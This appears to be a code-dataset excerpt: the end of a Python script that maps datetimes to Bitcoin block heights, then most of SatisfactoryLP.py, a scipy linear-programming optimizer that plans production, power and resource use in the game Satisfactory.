dt = datetime.datetime(int(year),int(month),int(day),int(hours),int(minutes))
return dt
def get_datetime_UTC(self, data):
dt = self.get_datetime(data)
timeshift = 0
if data.get("type_time") == '1':
timeshift = int(data.get("timezone")) + 1
else:
timeshift = int(data.get("timezone"))
naive_normalized_dt = dt + timedelta(hours=-int(timeshift))
# make UTC-UNIX timestamp element
# https://medium.com/swlh/making-sense-of-timezones-in-python-16d8ae210c1c
# Treat this time as being in the UTC timezone
aware_normalized_dt = timezone('UTC').localize(naive_normalized_dt)
return aware_normalized_dt
def get_unix_datetime(self, data):
''' convert input datetime to unix, which is the same format as Bitcoin block time
data: the key/value pairs from HTML post form
return: unix timestamp
'''
# Convert to UTC Time
dt_UTC = self.get_datetime_UTC(data)
# Convert to UNIX Time
udt = dt_UTC.timestamp()
if udt:
return udt
else:
return False
def get_corresponding_block(self, unix_datetime):
''' Give back the block closest to the user's UTC datetime '''
# Example [block_height, time_stamp]: # 1469,1232752933 # 1470,1232753217
data = list(csv.reader(open('block-data.csv')))[1:]
result = min(data, key=lambda x:abs(int(x[-1])-unix_datetime))
return result[0]
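# Illustrative example of the lookup above: each CSV row is [block_height, unix_time], and
# min(..., key=...) picks the row whose timestamp is nearest to the target. With the rows
# ['1469', '1232752933'] and ['1470', '1232753217'] and unix_datetime = 1232753076,
# the distances are 143 vs 141, so block '1470' is returned.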
def get_backconvertet_datetime(self, unix_datetime):
''' Convert a UNIX timestamp back to local machine time '''
return datetime.datetime.fromtimestamp(unix_datetime)
def get_actual_unix_timestamp(self):
return None
def get_latest_block_time_CSV(self):
all_lines = list(csv.reader(open('block-data.csv')))[1:]
last_line = all_lines[-1]
latest_update = self.get_backconvertet_datetime(int(last_line[1]))
return latest_update
if __name__ == "__main__":
date_time_object = DateConverter()
date_time_object.get_corresponding_block(1232753076)
``` |
{
"source": "0xjc/SatisfactoryLP",
"score": 3
} |
#### File: 0xjc/SatisfactoryLP/SatisfactoryLP.py
```python
import scipy.optimize
import json
import numpy as np
import re
import sys
import math
import argparse
from collections import defaultdict
from pprint import pprint
def float_list(s):
return [float(x) for x in s.split(",")] if s else []
parser = argparse.ArgumentParser()
parser.add_argument("--transport-power-cost", type=float, default=50.0,
help="added power cost for transport per conveyor/pipeline of mined resource")
parser.add_argument("--drone-battery-cost", type=float, default=0.5,
help="added battery cost for drone transport per conveyor/pipeline of mined resource")
parser.add_argument("--machine-penalty", type=float, default=2000.0,
help="objective penalty per machine built")
parser.add_argument("--conveyor-penalty", type=float, default=0.0,
help="objective penalty per conveyor belt needed")
parser.add_argument("--pipeline-penalty", type=float, default=0.0,
help="objective penalty per pipeline needed")
parser.add_argument("--power-shard-penalty-ratio", type=float, default=0.6,
help="objective penalty per power shard used, specified as ratio of machine penalty")
parser.add_argument("--extra-miner-clocks", type=float_list, default=[],
help="extra clock choices for miners, specified as decimals")
parser.add_argument("--extra-manufacturer-clocks", type=float_list, default=[0.25, 0.5, 0.75],
help="extra clock choices for manufacturers, specified as decimals")
parser.add_argument("--allow-waste", action="store_true",
help="allow accumulation of nuclear waste and other unsinkable items")
parser.add_argument("--show-unused", action="store_true",
help="show unused LP columns (coeff 0) in the optimization result")
parser.add_argument("--xlsx-report", type=str, default="Report.xlsx",
help="path to xlsx report output")
parser.add_argument("--xlsx-sheet-suffix", type=str, default="",
help="suffix to add to xlsx sheet names")
args = parser.parse_args()
### Constants ###
# Common
STACK_SIZES = {
"SS_HUGE": 500,
"SS_BIG": 200,
"SS_MEDIUM": 100,
"SS_SMALL": 50,
"SS_ONE": 1,
"SS_FLUID": 50000,
}
MACHINE_POWER_SHARD_LIMIT = 3
EPSILON = 1e-9
# Logistics
CONVEYOR_BELT_CLASS = "Build_ConveyorBeltMk5_C"
PIPELINE_CLASS = "Build_PipelineMK2_C"
# Resource extraction
MINER_CLASS = "Build_MinerMk3_C"
OIL_EXTRACTOR_CLASS = "Build_OilPump_C"
WATER_EXTRACTOR_CLASS = "Build_WaterPump_C"
RESOURCE_WELL_EXTRACTOR_CLASS = "Build_FrackingExtractor_C"
RESOURCE_WELL_PRESSURIZER_CLASS = "Build_FrackingSmasher_C"
# Sink
SINK_CLASS = "Build_ResourceSink_C"
# Water
WATER_CLASS = "Desc_Water_C"
# Nuclear power
NUCLEAR_WASTE_MAPPINGS = {
"Desc_NuclearFuelRod_C": "Desc_NuclearWaste_C",
"Desc_PlutoniumFuelRod_C": "Desc_PlutoniumWaste_C",
}
# Geothermal power
GEOTHERMAL_GENERATOR_CLASS = "Build_GeneratorGeoThermal_C"
GEYSER_CLASS = "Desc_Geyser_C"
# Resource map
PURITY_MULTIPLIERS = {
"impure": 0.5,
"normal": 1.0,
"pure": 2.0,
}
POWER_SLUG_SHARDS = {
"greenSlugs": 1,
"yellowSlugs": 2,
"purpleSlugs": 5,
}
RESOURCE_MAPPINGS = {
"Desc_LiquidOilWell_C": "Desc_LiquidOil_C",
"Desc_SAM_C": None, # exclude
}
# Miscellaneous
BIOMASS_GENERATOR_CLASS = "Build_GeneratorBiomass_C"
BATTERY_CLASS = "Desc_Battery_C"
ADDITIONAL_ITEMS = {
"Desc_PlutoniumWaste_C": {
"class": "Desc_PlutoniumWaste_C",
"display_name": "Plutonium Waste",
"form": "RF_SOLID",
"points": 0,
"stack_size": STACK_SIZES["SS_HUGE"],
"energy": 0.0,
},
}
ADDITIONAL_DISPLAY_NAMES = {
GEYSER_CLASS: "Geyser",
}
docs_path = r"Docs.json"
map_info_path = r"MapInfo.json"
with open(docs_path, "r", encoding="utf-16") as f:
docs_raw = json.load(f)
class_entries = {}
class_types = {}
for fg_entry in docs_raw:
class_type = re.sub(r"Class'/Script/FactoryGame.(\w+)'", r"\1", fg_entry["NativeClass"])
class_type_list = []
for class_entry in fg_entry["Classes"]:
class_name = class_entry["ClassName"]
if class_name in class_entries:
print(f"WARNING: ignoring duplicate class {class_name}")
else:
class_entries[class_name] = class_entry
class_type_list.append(class_entry)
class_types[class_type] = class_type_list
### Parsing helpers ###
def parse_paren_list(s):
if not s:
return None
assert(s.startswith("(") and s.endswith(")"))
s = s[1:-1]
if not s:
return []
else:
return s.split(",")
def find_class_name(s):
m = re.search(r"\.\w+", s)
if m is None:
raise ValueError(f"could not find class name in: {s}")
return m[0][1:]
def parse_class_list(s):
l = parse_paren_list(s)
if l is None:
return l
return [find_class_name(x) for x in l]
def find_item_amounts(s):
for m in re.finditer(r"\(ItemClass=([^,]+),Amount=(\d+)\)", s):
yield (find_class_name(m[1]), int(m[2]))
### Misc constants ###
CONVEYOR_BELT_LIMIT = 0.5 * float(class_entries[CONVEYOR_BELT_CLASS]["mSpeed"])
PIPELINE_LIMIT = 60000.0 * float(class_entries[PIPELINE_CLASS]["mFlowLimit"])
SINK_POWER_CONSUMPTION = float(class_entries[SINK_CLASS]["mPowerConsumption"])
print(f"CONVEYOR_BELT_LIMIT: {CONVEYOR_BELT_LIMIT}")
print(f"PIPELINE_LIMIT: {PIPELINE_LIMIT}")
print(f"SINK_POWER_CONSUMPTION: {SINK_POWER_CONSUMPTION}")
### Miners ###
def parse_miner(entry):
if entry["ClassName"] == RESOURCE_WELL_PRESSURIZER_CLASS:
extractor = class_entries[RESOURCE_WELL_EXTRACTOR_CLASS]
else:
extractor = entry
return {
"class": entry["ClassName"],
"display_name": entry["mDisplayName"],
"power_consumption": float(entry["mPowerConsumption"]),
"power_consumption_exponent": float(entry["mPowerConsumptionExponent"]),
"min_clock": float(entry["mMinPotential"]),
"max_clock_base": float(entry["mMaxPotential"]),
"max_clock_per_power_shard": float(entry["mMaxPotentialIncreasePerCrystal"]),
"rate": 60.0 / float(extractor["mExtractCycleTime"]) * float(extractor["mItemsPerCycle"]),
"only_allow_certain_resources": (extractor["mOnlyAllowCertainResources"] == "True"),
"allowed_resource_forms": parse_paren_list(extractor["mAllowedResourceForms"]),
"allowed_resources": parse_class_list(extractor["mAllowedResources"]),
}
miners = {}
for name in (MINER_CLASS, OIL_EXTRACTOR_CLASS, WATER_EXTRACTOR_CLASS, RESOURCE_WELL_PRESSURIZER_CLASS):
miners[name] = parse_miner(class_entries[name])
# pprint(miners)
### Manufacturers ###
def parse_manufacturer(entry):
return {
"class": entry["ClassName"],
"display_name": entry["mDisplayName"],
"power_consumption": float(entry["mPowerConsumption"]),
"power_consumption_exponent": float(entry["mPowerConsumptionExponent"]),
"min_clock": float(entry["mMinPotential"]),
"max_clock_base": float(entry["mMaxPotential"]),
"max_clock_per_power_shard": float(entry["mMaxPotentialIncreasePerCrystal"]),
}
manufacturers = {}
for entry in class_types["FGBuildableManufacturer"]:
manufacturer = parse_manufacturer(entry)
manufacturer["is_variable_power"] = False
manufacturers[entry["ClassName"]] = manufacturer
for entry in class_types["FGBuildableManufacturerVariablePower"]:
manufacturer = parse_manufacturer(entry)
manufacturer["is_variable_power"] = True
manufacturers[entry["ClassName"]] = manufacturer
# pprint(manufacturers)
### Recipes ###
def parse_recipe(entry):
recipe_manufacturer = None
for manufacturer in parse_class_list(entry["mProducedIn"]) or []:
if manufacturer in manufacturers:
recipe_manufacturer = manufacturer
break
# we are only considering automatable recipes
if recipe_manufacturer is None:
return None
rate = 60.0 / float(entry["mManufactoringDuration"])
def item_rates(key):
return [(item, rate * amount) for (item, amount) in find_item_amounts(entry[key])]
vpc_constant = float(entry["mVariablePowerConsumptionConstant"])
vpc_factor = float(entry["mVariablePowerConsumptionFactor"])
return {
"class": entry["ClassName"],
"display_name": entry["mDisplayName"],
"manufacturer": recipe_manufacturer,
"inputs": item_rates("mIngredients"),
"outputs": item_rates("mProduct"),
"variable_power_consumption": vpc_constant + 0.5 * vpc_factor,
}
recipes = {}
for entry in class_types["FGRecipe"]:
recipe = parse_recipe(entry)
if recipe is not None:
recipes[entry["ClassName"]] = recipe
# pprint(recipes)
### Items ###
def parse_item(entry):
points = int(entry["mResourceSinkPoints"])
return {
"display_name": entry["mDisplayName"],
"form": entry["mForm"],
"points": int(entry["mResourceSinkPoints"]),
"stack_size": STACK_SIZES[entry["mStackSize"]],
"energy": float(entry["mEnergyValue"]),
}
items = {}
# any items not contained in Docs.json
items.update(ADDITIONAL_ITEMS)
for class_type in [
"FGItemDescriptor",
"FGItemDescriptorBiomass",
"FGItemDescriptorNuclearFuel",
"FGResourceDescriptor",
"FGEquipmentDescriptor",
"FGConsumableDescriptor",
]:
for entry in class_types[class_type]:
item = parse_item(entry)
if class_type == "FGItemDescriptorNuclearFuel":
item["nuclear_waste"] = NUCLEAR_WASTE_MAPPINGS[entry["ClassName"]]
item["nuclear_waste_amount"] = float(entry["mAmountOfWaste"])
items[entry["ClassName"]] = item
# pprint(items)
### Generators ###
generators = {}
def parse_generator(entry):
power_production = float(entry["mPowerProduction"])
return {
"display_name": entry["mDisplayName"],
"fuel_classes": parse_class_list(entry["mDefaultFuelClasses"]),
"power_production": power_production,
"power_production_exponent": float(entry["mPowerProductionExponent"]),
"requires_supplemental": (entry["mRequiresSupplementalResource"] == "True"),
"supplemental_to_power_ratio": float(entry["mSupplementalToPowerRatio"]),
}
def parse_geothermal_generator(entry):
# unclear why mVariablePowerProductionConstant=0 in the json;
# it's set to 100.0f in the header, which we will hardcode here
return {
"display_name": entry["mDisplayName"],
"power_production": 100.0 + 0.5 * float(entry["mVariablePowerProductionFactor"]),
}
# coal and fuel generators
for entry in class_types["FGBuildableGeneratorFuel"]:
# exclude biomass generator
if entry["ClassName"] == BIOMASS_GENERATOR_CLASS:
continue
generators[entry["ClassName"]] = parse_generator(entry)
# nuclear power plant
for entry in class_types["FGBuildableGeneratorNuclear"]:
generators[entry["ClassName"]] = parse_generator(entry)
# geothermal generator (special case)
geothermal_generator = parse_geothermal_generator(class_entries[GEOTHERMAL_GENERATOR_CLASS])
# pprint(generators)
### Resources ###
with open(map_info_path, "r") as f:
map_info_raw = json.load(f)
map_info = {}
for tab in map_info_raw["options"]:
if "tabId" in tab:
map_info[tab["tabId"]] = tab["options"]
TOTAL_POWER_SHARDS = 0
for slug_type in map_info["power_slugs"][0]["options"]:
TOTAL_POWER_SHARDS += POWER_SLUG_SHARDS[slug_type["layerId"]] * len(slug_type["markers"])
print(f"TOTAL_POWER_SHARDS: {TOTAL_POWER_SHARDS}")
resources = {}
geysers = {}
def parse_and_add_node_type(node_type):
if "type" not in node_type:
return
item = node_type["type"]
if item in RESOURCE_MAPPINGS:
item = RESOURCE_MAPPINGS[item]
if item is None:
return
output = geysers if item == GEYSER_CLASS else resources
for node_purity in node_type["options"]:
purity = node_purity["purity"]
nodes = node_purity["markers"]
if not nodes:
continue
sample_node = nodes[0]
if "core" in sample_node:
# resource well satellite nodes, map them to cores
for node in nodes:
subtype = find_class_name(node["core"])
resource_id = f"{item}|{subtype}"
if resource_id not in output:
output[resource_id] = {
"resource_id": resource_id,
"item": item,
"subtype": subtype,
"multiplier": 0.0,
"count": 1,
"is_limited": True,
"is_resource_well": True,
"num_satellites": 0,
}
output[resource_id]["multiplier"] += PURITY_MULTIPLIERS[purity]
output[resource_id]["num_satellites"] += 1
else:
# normal nodes, add directly
subtype = purity
resource_id = f"{item}|{subtype}"
assert(resource_id not in output)
output[resource_id] = {
"resource_id": resource_id,
"item": item,
"subtype": subtype,
"multiplier": PURITY_MULTIPLIERS[purity],
"count": len(nodes),
"is_limited": True,
"is_resource_well": False,
}
for node_type in map_info["resource_nodes"]:
parse_and_add_node_type(node_type)
for node_type in map_info["resource_wells"]:
parse_and_add_node_type(node_type)
resources[WATER_CLASS] = {
"resource_id": f"{WATER_CLASS}:extractor",
"item": WATER_CLASS,
"subtype": "extractor",
"multiplier": 1,
"is_limited": False,
"is_resource_well": False,
}
# pprint(resources)
# pprint(geysers)
### LP setup ###
class LPColumn(dict):
def __init__(self, *args, display_info=None, **kwargs):
super().__init__(*args, **kwargs)
self.display_info = display_info
lp_columns = {}
lp_equalities = {}
lp_lower_bounds = {}
def get_power_consumption(machine, clock=1.0, recipe=None):
power_consumption = machine["power_consumption"]
if recipe is not None and machine.get("is_variable_power", False):
power_consumption += recipe["variable_power_consumption"]
return power_consumption * (clock ** machine["power_consumption_exponent"])
def get_miner_for_resource(resource):
item_class = resource["item"]
item = items[item_class]
candidates = []
for miner_class, miner in miners.items():
if ((resource["is_resource_well"]) == (miner_class == RESOURCE_WELL_PRESSURIZER_CLASS)
and item["form"] in miner["allowed_resource_forms"]
and (not miner["only_allow_certain_resources"] or item_class in miner["allowed_resources"])):
candidates.append(miner_class)
if not candidates:
raise RuntimeError(f"could not find miner for resource {item_class}")
elif len(candidates) > 1:
raise RuntimeError(f"more than one miner for resource {item_class}: {candidates}")
return candidates[0]
def get_form_conveyance_limit(form):
if form == "RF_SOLID":
return CONVEYOR_BELT_LIMIT
elif form == "RF_LIQUID" or form == "RF_GAS":
return PIPELINE_LIMIT
else:
assert(False)
def get_max_overclock(machine):
return machine["max_clock_base"] + MACHINE_POWER_SHARD_LIMIT * machine["max_clock_per_power_shard"]
def get_conveyance_limit_clock(item, rate):
conveyance_limit = get_form_conveyance_limit(item["form"])
return math.floor(1000000 * conveyance_limit / rate) / 1000000
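# Flooring at the sixth decimal place keeps the chosen clock at or below the belt/pipe
# throughput limit; clocks are assumed here to be representable to 1e-6 (i.e. 0.0001%).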
def get_max_miner_clock(miner, resource, rate):
max_overclock = get_max_overclock(miner)
if resource["is_resource_well"]:
return max_overclock
item_class = resource["item"]
item = items[item_class]
return min(max_overclock, get_conveyance_limit_clock(item, rate))
def get_max_manufacturer_clock(manufacturer, recipe):
max_clock = get_max_overclock(manufacturer)
for (item_class, rate) in recipe["inputs"]:
max_clock = min(max_clock, get_conveyance_limit_clock(items[item_class], rate))
for (item_class, rate) in recipe["outputs"]:
max_clock = min(max_clock, get_conveyance_limit_clock(items[item_class], rate))
return max_clock
def get_power_shards_needed(machine, clock):
return max(0, math.ceil((clock - machine["max_clock_base"]) / machine["max_clock_per_power_shard"]))
def get_item_display_name(item_class):
if item_class in items:
return items[item_class]["display_name"]
else:
return ADDITIONAL_DISPLAY_NAMES[item_class]
def add_lp_column(column, type_, name, display_name=None, machine_name=None, subtype=None, clock=None):
tokens = [type_, name]
if subtype is not None:
tokens.append(subtype)
if clock is not None:
clock_percent = 100.0 * clock
tokens.append(f"{clock_percent}")
column_id = "|".join(tokens)
display_info = {
"type": type_,
"display_name": display_name or name,
"machine_name": machine_name,
"subtype": subtype,
"clock": clock,
}
lp_columns[column_id] = LPColumn(column, display_info=display_info)
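# Each LP column is one activity mapping variable names to per-unit coefficients.
# A miner column, for instance, produces its item at clock * rate per minute, consumes one
# node of the corresponding limited resource (coefficient -1), and draws clock-scaled power;
# item variables are balanced to zero via equalities, node counts via lower bounds.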
for resource_id, resource in resources.items():
item_class = resource["item"]
item = items[item_class]
miner_class = get_miner_for_resource(resource)
miner = miners[miner_class]
rate = miner["rate"] * resource["multiplier"]
min_clock = miner["min_clock"]
max_clock_base = miner["max_clock_base"]
max_clock = get_max_miner_clock(miner, resource, rate)
resource_var = f"resource|{resource_id}"
item_var = f"item|{item_class}"
clock_choices = {max_clock_base, max_clock}
for clock in args.extra_miner_clocks:
clock = min(max_clock, max(min_clock, clock))
clock_choices.add(clock)
for clock in sorted(clock_choices):
column = {
item_var: clock * rate,
"power_consumption": get_power_consumption(miner, clock=clock),
"machines": 1 + (resource["num_satellites"] if resource["is_resource_well"] else 0),
}
if resource["is_limited"]:
column[resource_var] = -1
power_shards = get_power_shards_needed(miner, clock)
if power_shards > 0:
column["power_shard_usage"] = power_shards
add_lp_column(
column,
type_="miner",
name=resource_id,
display_name=item["display_name"],
machine_name=miner["display_name"],
subtype=resource["subtype"],
clock=clock,
)
if resource["is_limited"]:
lp_lower_bounds[resource_var] = -resource["count"]
lp_equalities[item_var] = 0.0
for recipe_class, recipe in recipes.items():
manufacturer_class = recipe["manufacturer"]
manufacturer = manufacturers[manufacturer_class]
min_clock = manufacturer["min_clock"]
max_clock_base = manufacturer["max_clock_base"]
max_clock = get_max_manufacturer_clock(manufacturer, recipe)
# let's not allow manufacturer OC by default, but it can be specified via option
clock_choices = {min_clock, max_clock_base}
for clock in args.extra_manufacturer_clocks:
clock = min(max_clock, max(min_clock, clock))
clock_choices.add(clock)
for clock in sorted(clock_choices):
column = {
"power_consumption": get_power_consumption(manufacturer, clock=clock, recipe=recipe),
"machines": 1,
}
for (item_class, rate) in recipe["inputs"]:
item_var = f"item|{item_class}"
column[item_var] = column.get(item_var, 0.0) - clock * rate
lp_equalities[item_var] = 0.0
for (item_class, rate) in recipe["outputs"]:
item_var = f"item|{item_class}"
column[item_var] = column.get(item_var, 0.0) + clock * rate
lp_equalities[item_var] = 0.0
power_shards = get_power_shards_needed(manufacturer, clock)
if power_shards > 0:
column["power_shard_usage"] = power_shards
add_lp_column(
column,
type_="manufacturer",
name=recipe_class,
display_name=recipe["display_name"],
machine_name=manufacturer["display_name"],
clock=clock,
)
for item_class, item in items.items():
points = item["points"]
item_var = f"item|{item_class}"
if not (item["form"] == "RF_SOLID" and points > 0):
if args.allow_waste:
add_lp_column(
{item_var: -1},
type_="waste",
name=item_class,
display_name=item["display_name"],
)
continue
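# Sink columns are per item sunk, so sink power draw and machine count are scaled by
# 1 / CONVEYOR_BELT_LIMIT (one sink can consume a full belt of items).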
column = {
item_var: -1,
"points": points,
"power_consumption": SINK_POWER_CONSUMPTION / CONVEYOR_BELT_LIMIT,
"machines": 1 / CONVEYOR_BELT_LIMIT,
}
add_lp_column(
column,
type_="sink",
name=item_class,
display_name=item["display_name"],
)
lp_equalities[item_var] = 0.0
for generator_class, generator in generators.items():
power_production = generator["power_production"]
for fuel_class in generator["fuel_classes"]:
fuel = items[fuel_class]
fuel_rate = 60.0 * power_production / fuel["energy"]
fuel_var = f"item|{fuel_class}"
column = {
fuel_var: -fuel_rate,
"power_production": power_production,
"machines": 1,
}
if generator["requires_supplemental"]:
supplemental_class = WATER_CLASS
supplemental_var = f"item|{supplemental_class}"
supplemental_rate = 60.0 * power_production * generator["supplemental_to_power_ratio"]
column[supplemental_var] = -supplemental_rate
lp_equalities[supplemental_var] = 0.0
if fuel_class in NUCLEAR_WASTE_MAPPINGS:
waste_class = NUCLEAR_WASTE_MAPPINGS[fuel_class]
waste_var = f"item|{waste_class}"
column[waste_var] = fuel_rate * fuel["nuclear_waste_amount"]
lp_equalities[waste_var] = 0.0
add_lp_column(
column,
type_="generator",
name=fuel_class,
display_name=fuel["display_name"],
machine_name=generator["display_name"],
clock=1,
)
for resource_id, resource in geysers.items():
resource_var = f"resource|{resource_id}"
column = {
resource_var: -1,
"power_production": geothermal_generator["power_production"] * resource["multiplier"],
"machines": 1,
}
add_lp_column(
column,
type_="generator",
name=resource_id,
display_name=get_item_display_name(GEYSER_CLASS),
machine_name=geothermal_generator["display_name"],
subtype=resource["subtype"],
)
lp_lower_bounds[resource_var] = -resource["count"]
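# Post-processing of every column: each produced item adds fractional conveyor/pipeline
# usage (output rate divided by belt/pipe capacity), and mined outputs additionally incur
# the configured transport power and drone battery costs per full belt/pipe.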
for column_id, column in lp_columns.items():
to_add = defaultdict(float)
for variable, coeff in column.items():
if abs(coeff) < EPSILON:
print(f"WARNING: zero or near-zero coeff: column_id={column_id} variable={variable} coeff={coeff}")
if variable.startswith("item|") and coeff > 0:
item_class = variable[5:]
if item_class not in items:
print(f"WARNING: item not found in items dict: {item_class}")
continue
item = items[item_class]
form = item["form"]
conveyance_limit = get_form_conveyance_limit(form)
conveyance = coeff / conveyance_limit
if column_id.startswith("miner|"):
to_add["transport_power_cost"] += args.transport_power_cost * conveyance
to_add["drone_battery_cost"] += args.drone_battery_cost * conveyance
if form == "RF_SOLID":
to_add["conveyors"] += conveyance
else:
to_add["pipelines"] += conveyance
for variable, coeff in to_add.items():
if coeff != 0.0:
column[variable] = column.get(variable, 0.0) + coeff
for objective in ["points", "machines", "conveyors", "pipelines"]:
column = {
objective: -1,
}
add_lp_column(
column,
type_="objective",
name=objective,
)
lp_equalities[objective] = 0.0
for extra_cost, cost_variable, cost_coeff in [
("transport_power_cost", "power_consumption", 1.0),
("drone_battery_cost", f"item|{BATTERY_CLASS}", -1.0),
]:
column = {
extra_cost: -1,
cost_variable: cost_coeff,
}
add_lp_column(
column,
type_="extra_cost",
name=extra_cost,
)
lp_equalities[extra_cost] = 0.0
column = {
"power_consumption": -1,
"power_production": -1,
}
add_lp_column(
column,
type_="power",
name="usage",
)
lp_equalities["power_consumption"] = 0.0
lp_lower_bounds["power_production"] = 0.0
column = {
"power_shard_usage": -1,
"power_shards": -1,
}
add_lp_column(
column,
type_="objective",
name="power_shards",
)
lp_equalities["power_shard_usage"] = 0.0
lp_lower_bounds["power_shards"] = -TOTAL_POWER_SHARDS
# pprint(lp_columns)
# pprint(lp_equalities)
# pprint(lp_lower_bounds)
def get_all_variables():
variables = set()
for column_id, column in lp_columns.items():
for variable, coeff in column.items():
variables.add(variable)
for variable in variables:
if variable not in lp_equalities and variable not in lp_lower_bounds:
print(f"WARNING: no constraint for variable: {variable}")
for variable in lp_equalities.keys():
if variable not in variables:
print(f"WARNING: equality constraint with unknown variable: {variable}")
for variable in lp_lower_bounds.keys():
if variable not in variables:
print(f"WARNING: lower bound constraint with unknown variable: {variable}")
return variables
variables = get_all_variables()
# pprint(variables)
### Pruning ###
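# Reachability fixpoint: repeatedly mark a column's outputs (positive item coefficients) as
# reachable once none of its inputs (negative item coefficients) are unreachable. Columns
# that still require an unreachable item after convergence can never run and are dropped.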
reachable_items = set()
while True:
any_added = False
for column_id, column in lp_columns.items():
eligible = True
to_add = set()
for variable, coeff in column.items():
if variable.startswith("item|") and variable not in reachable_items:
if coeff > 0:
to_add.add(variable)
elif coeff < 0:
eligible = False
break
if eligible and to_add:
any_added = True
reachable_items |= to_add
if not any_added:
break
unreachable_items = set(v for v in variables if v.startswith("item|")) - reachable_items
print("pruning unreachable items:")
pprint(unreachable_items)
columns_to_prune = list()
for column_id, column in lp_columns.items():
for variable, coeff in column.items():
if variable in unreachable_items and coeff < 0:
columns_to_prune.append(column_id)
break
for column_id in columns_to_prune:
# pprint(lp_columns[column_id])
del lp_columns[column_id]
for item_var in unreachable_items:
if item_var in lp_equalities:
del lp_equalities[item_var]
variables = get_all_variables()
# pprint(variables)
# pprint(lp_columns)
# pprint(lp_equalities)
# pprint(lp_lower_bounds)
### LP run ###
def to_index_map(seq):
return {value: index for index, value in enumerate(seq)}
def from_index_map(d):
result = [None] * len(d)
for value, index in d.items():
result[index] = value
return result
# order is for report display, but we might as well sort it here
column_type_order = to_index_map(["objective", "power", "extra_cost", "sink", "waste", "manufacturer", "miner", "generator"])
column_subtype_order = to_index_map(["impure", "normal", "pure"])
objective_order = to_index_map(["points", "machines", "conveyors", "pipelines", "power_shards"])
extra_cost_order = to_index_map(["transport_power_cost", "drone_battery_cost"])
def column_order_key(arg):
column_id, column = arg
info = column.display_info
type_ = info["type"]
if type_ in column_type_order:
type_key = (0, column_type_order[type_])
else:
type_key = (1, type_)
name = info["display_name"]
if type_ == "objective":
name_key = objective_order[name]
elif type_ == "extra_cost":
name_key = extra_cost_order[name]
else:
name_key = name
subtype = info["subtype"]
if subtype in column_subtype_order:
subtype_key = (0, column_subtype_order[subtype])
else:
subtype_key = (1, subtype)
return (type_key, name_key, subtype_key, info["clock"], column_id)
sorted_columns = sorted(lp_columns.items(), key=column_order_key)
indices_eq = to_index_map(sorted(lp_equalities.keys()))
indices_lb = to_index_map(sorted(lp_lower_bounds.keys()))
# pprint(indices_eq)
# pprint(indices_lb)
lp_c = np.zeros(len(lp_columns), dtype=np.double)
lp_A_eq = np.zeros((len(lp_equalities), len(lp_columns)), dtype=np.double)
lp_b_eq = np.zeros(len(lp_equalities), dtype=np.double)
lp_A_lb = np.zeros((len(lp_lower_bounds), len(lp_columns)), dtype=np.double)
lp_b_lb = np.zeros(len(lp_lower_bounds), dtype=np.double)
objective_weights = {f"objective|{obj}": weight for (obj, weight) in {
"points": 1,
"machines": -args.machine_penalty,
"conveyors": -args.conveyor_penalty,
"pipelines": -args.pipeline_penalty,
"power_shards": -args.power_shard_penalty_ratio * args.machine_penalty,
}.items()}
for column_index, (column_id, column) in enumerate(sorted_columns):
if column_id in objective_weights:
lp_c[column_index] = objective_weights[column_id]
for variable, coeff in column.items():
if variable in lp_equalities:
lp_A_eq[indices_eq[variable], column_index] = coeff
else:
lp_A_lb[indices_lb[variable], column_index] = coeff
for variable, rhs in lp_equalities.items():
lp_b_eq[indices_eq[variable]] = rhs
for variable, rhs in lp_lower_bounds.items():
lp_b_lb[indices_lb[variable]] = rhs
print("running LP")
lp_result = scipy.optimize.linprog(-lp_c, A_ub=-lp_A_lb, b_ub=-lp_b_lb, A_eq=lp_A_eq, b_eq=lp_b_eq, method="highs")
if lp_result.status != 0:
print("ERROR: LP did not terminate successfully")
pprint(lp_result)
sys.exit(1)
pprint(lp_result)
### Display formatting ###
def format_subtype(subtype):
if subtype is None or subtype == "extractor":
return None
return re.sub(r"^BP_FrackingCore_?", "#", subtype).capitalize()
def get_column_desc(column):
info = column.display_info
tokens = [info["machine_name"] or info["type"], info["display_name"]]
subtype = format_subtype(info["subtype"])
if subtype is not None:
tokens.append(subtype)
if info["clock"] is not None:
clock_percent = 100.0 * info["clock"]
tokens.append(f"{clock_percent}%")
return "|".join(tokens)
column_results = [
(column_id, column, lp_result.x[column_index])
for column_index, (column_id, column) in enumerate(sorted_columns)
]
if not args.show_unused:
column_results = list(filter(lambda x: abs(x[2]) > EPSILON, column_results))
variable_breakdowns = {variable: {"production": [], "consumption": []} for variable in variables}
for column_id, column, column_coeff in column_results:
column_desc = get_column_desc(column)
print(f"{column_desc} = {column_coeff}")
for variable, coeff in column.items():
rate = column_coeff * coeff
source = {
"desc": column_desc,
"count": column_coeff,
"rate": abs(rate),
}
if abs(rate) < EPSILON:
continue
elif rate > 0:
variable_breakdowns[variable]["production"].append(source)
else:
variable_breakdowns[variable]["consumption"].append(source)
variable_order = to_index_map(
from_index_map(objective_order)
+ ["power_production", "power_consumption"]
+ from_index_map(extra_cost_order)
+ ["power_shards", "power_shard_usage", "item", "resource"]
)
def get_variable_display_info(variable):
tokens = variable.split("|")
type_ = tokens[0]
if type_ == "item" or type_ == "resource":
item_class = tokens[1]
tokens[1] = get_item_display_name(item_class)
return (type_, "|".join(tokens))
def finalize_variable_budget_side(budget_side):
if not budget_side:
return
total_rate = 0.0
for entry in budget_side:
total_rate += entry["rate"]
for entry in budget_side:
entry["share"] = entry["rate"] / total_rate
budget_side.sort(key=lambda entry: (-entry["share"], entry["desc"]))
budget_side.insert(0, {"desc": "Total", "count": "n/a", "rate": total_rate, "share": 1.0})
for variable, breakdown in variable_breakdowns.items():
type_, name = get_variable_display_info(variable)
# don't show offsetting dummy items in the breakdown (e.g. "objective|points" as consumer of points)
# currently these are precisely the consumption of special variables, but that may change
if type_ not in ["item", "resource"]:
breakdown["consumption"] = []
breakdown["type_order"] = variable_order[type_]
breakdown["name"] = name
if variable in indices_lb:
slack = lp_result.slack[indices_lb[variable]]
if slack < -EPSILON:
print(f"WARNING: lower bound violation: variable={variable} slack={slack}")
breakdown["initial"] = -lp_lower_bounds[variable]
breakdown["final"] = slack
else:
con = lp_result.con[indices_eq[variable]]
if abs(con) > EPSILON:
print(f"WARNING: equality constraint violation: variable={variable} con={con}")
finalize_variable_budget_side(breakdown["production"])
finalize_variable_budget_side(breakdown["consumption"])
sorted_variable_breakdowns = sorted(variable_breakdowns.values(), key=lambda bd: (bd["type_order"], bd["name"]))
# pprint(sorted_variable_breakdowns)
if args.xlsx_report:
print("writing xlsx report")
import xlsxwriter
workbook = xlsxwriter.Workbook(args.xlsx_report)
default_format = workbook.add_format({"align": "center"})
top_format = workbook.add_format({"align": "center", "top": True})
